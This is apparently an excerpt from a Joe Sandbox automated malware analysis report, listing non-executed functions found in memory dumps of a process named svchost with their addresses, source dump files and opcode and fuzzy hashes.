                                                                            Non-executed Functions

                                                                            Function 0397088E Relevance: .6, Instructions: 606COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 1111c6207f17b941e1c3e32ac3aef51df3584f231138b1e3a5da1aad01d858a9
                                                                            • Instruction ID: 772926c8315f62ec0a8e66572b0a5fc12d76efbaec961d81e9d7edce4767b53d
                                                                            • Opcode Fuzzy Hash: 1111c6207f17b941e1c3e32ac3aef51df3584f231138b1e3a5da1aad01d858a9
                                                                            • Instruction Fuzzy Hash: B8424C759007199FDB60CF28C880BAAB7F9FF44314F1445A9E999DB381E770A984CFA0
                                                                            Function 03974260 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 970a195801667399288163781bc2106f03dcb98cae0312fbbbc9ede7b872ba30
                                                                            • Instruction ID: d2b3f666e6162e206ab324ddc81de55a647d4f5fdf8923f15c3d2b1ae73835b9
                                                                            • Opcode Fuzzy Hash: 970a195801667399288163781bc2106f03dcb98cae0312fbbbc9ede7b872ba30
                                                                            • Instruction Fuzzy Hash: E8900231609504529540B3584984546405597E0301B91C815E0514554CCB2489566371
                                                                            Function 03974570 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7637b42dafb0bf37381d439b34c82ea072e2208cf53e2f0515dad6a9ee38f5aa
                                                                            • Instruction ID: ef98ad5a69db5d9526abd1174e61079f7181b21c6b1925264076cb2512b50946
                                                                            • Opcode Fuzzy Hash: 7637b42dafb0bf37381d439b34c82ea072e2208cf53e2f0515dad6a9ee38f5aa
                                                                            • Instruction Fuzzy Hash: C7900261605204824540B3584904406605597E13013D1C919A0644560CC7288855A279
                                                                            Function 03972B80 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9c53567a0186286826609869ce27a1909da7acca816e64a5ac8026d44782a406
                                                                            • Instruction ID: a1b406de3ba838b49f57ddaa07737227c2bba4c00ed8b2693f076ee3fb9f6039
                                                                            • Opcode Fuzzy Hash: 9c53567a0186286826609869ce27a1909da7acca816e64a5ac8026d44782a406
                                                                            • Instruction Fuzzy Hash: B290023120510C82D500B3584504B46005587E0301F91C81AA0214654DC725C8517531
                                                                            Function 03972BE0 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8619b2d7af488d9e4872d09cf523c85c86f8266ada8874961de269390c20ef8d
                                                                            • Instruction ID: 58bf9b16a1d95851a3dc8646d8c5fa22a40cc4d90ffb82513cd81839b6bf9d2c
                                                                            • Opcode Fuzzy Hash: 8619b2d7af488d9e4872d09cf523c85c86f8266ada8874961de269390c20ef8d
                                                                            • Instruction Fuzzy Hash: 0490022160910842D540B3585518706006587D0201F91D815A0114554DC7698A5576B1
                                                                            Function 03972B10 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 815d37309cd98ca211fad5943ee1aba81163351e43efe5e825e23eaa140528a9
                                                                            • Instruction ID: 5d68a91e8a2af4b71555d733baf103ba52e69070c650ed285b28775945878af9
                                                                            • Opcode Fuzzy Hash: 815d37309cd98ca211fad5943ee1aba81163351e43efe5e825e23eaa140528a9
                                                                            • Instruction Fuzzy Hash: 0890023120510C42D580B358450464A005587D1301FD1C819A0115654DCB258A5977B1
                                                                            Function 03972B00 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 434794da032fcb365a41ac508650bff565eb42d00b251cc73ead14dfc359f3ee
                                                                            • Instruction ID: a96c99a1b01585c369cc86cd51a0d369b7386ea10ae5e84d6f03077ac490db79
                                                                            • Opcode Fuzzy Hash: 434794da032fcb365a41ac508650bff565eb42d00b251cc73ead14dfc359f3ee
                                                                            • Instruction Fuzzy Hash: C290023120914C82D540B3584504A46006587D0305F91C815A0154694DD7358D55B671
                                                                            Function 03972AA0 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 89ca475b593c8272d0accd2eaa642cdd0623390c308ea30fc6a534576e7b6b99
                                                                            • Instruction ID: e07ea8e9978111ee9a3ca9c8fd7e27d2ae52d1efacd25e78fb645821ce95ff51
                                                                            • Opcode Fuzzy Hash: 89ca475b593c8272d0accd2eaa642cdd0623390c308ea30fc6a534576e7b6b99
                                                                            • Instruction Fuzzy Hash: 0890023120510C42D504B3584904686005587D0301F91C815A6114655ED77588917131
                                                                            Function 03972AC0 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3f9175e6e87571a0c4cb7c451458ecf9d817f5c3a903b0417c86e282ad0c2a2b
                                                                            • Instruction ID: 62540360eeb9568345ecd086cf19f2ab7a9cc14e11403c80e73c9a18a9d33732
                                                                            • Opcode Fuzzy Hash: 3f9175e6e87571a0c4cb7c451458ecf9d817f5c3a903b0417c86e282ad0c2a2b
                                                                            • Instruction Fuzzy Hash: 0D90023160910C42D550B3584514746005587D0301F91C815A0114654DC7658A5576B1
                                                                            Function 03972A10 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 63a58d2ec3b6b79bdb02542b0bc83300214869e56e362c75cee4bba21fd5b681
                                                                            • Instruction ID: 8598ebba16ddc099c34a32d718c02b510e4c8041945352ed6832a01de19f04c5
                                                                            • Opcode Fuzzy Hash: 63a58d2ec3b6b79bdb02542b0bc83300214869e56e362c75cee4bba21fd5b681
                                                                            • Instruction Fuzzy Hash: 83900225225104420545F758070450B049597D63513D1C819F1506590CC73188656331
                                                                            Function 039729D0 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f9ffd09d411f0580720ade11c927cc3d7bedc3c6b118d4cb94c2c3ec251cc1bc
                                                                            • Instruction ID: fce756add1e7685f472e0c0b17c772379a8e5e62513eec3db0beb7cc98638019
                                                                            • Opcode Fuzzy Hash: f9ffd09d411f0580720ade11c927cc3d7bedc3c6b118d4cb94c2c3ec251cc1bc
                                                                            • Instruction Fuzzy Hash: 639002A1205244D24900F3588504B0A455587E0201B91C81AE1144560CC6358851A135
                                                                            Function 039729F0 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1b5cead274e553075d18262e01daf1fa8b758be4156491ae6b3baa9ee5f0526b
                                                                            • Instruction ID: f8aedf5b24978dcdd6dcf358b82fbe8a1c37ffb36ef217014500a22f46c26ef4
                                                                            • Opcode Fuzzy Hash: 1b5cead274e553075d18262e01daf1fa8b758be4156491ae6b3baa9ee5f0526b
                                                                            • Instruction Fuzzy Hash: 6C900435315104430505F75C070450700D7C7D53513D1CC35F1105550CD731CC717131
                                                                            Function 03972B20 Relevance: .0, Instructions: 2COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction ID: 27d54449ef0490f9f701589e11fc389b7c499c94a761fc73ee6545bddcbbe6b1
                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction Fuzzy Hash: